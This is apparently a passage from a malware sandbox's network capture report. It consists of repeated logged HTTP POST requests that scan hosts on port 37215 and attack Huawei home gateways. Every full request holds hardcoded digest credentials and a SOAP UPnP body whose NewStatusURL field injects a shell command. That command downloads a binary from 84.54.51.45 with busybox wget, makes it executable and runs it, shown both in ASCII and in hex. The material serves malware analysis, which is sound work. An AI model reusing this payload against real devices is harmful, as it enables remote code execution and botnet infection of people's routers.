2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2495192.168.2.153883841.147.252.8237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817225933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2496192.168.2.156001441.231.115.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817250967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2497192.168.2.154627441.108.179.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817272902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2498192.168.2.154301641.242.108.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817334890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2499192.168.2.155149841.109.13.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817339897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2500192.168.2.154341641.246.120.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817344904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2501192.168.2.155055041.236.81.10337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817364931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2502192.168.2.153833441.228.191.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817390919 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2503192.168.2.155245241.61.37.16637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817435026 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2504192.168.2.156093241.125.89.9837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817461967 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2505192.168.2.155645441.11.51.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.817502022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
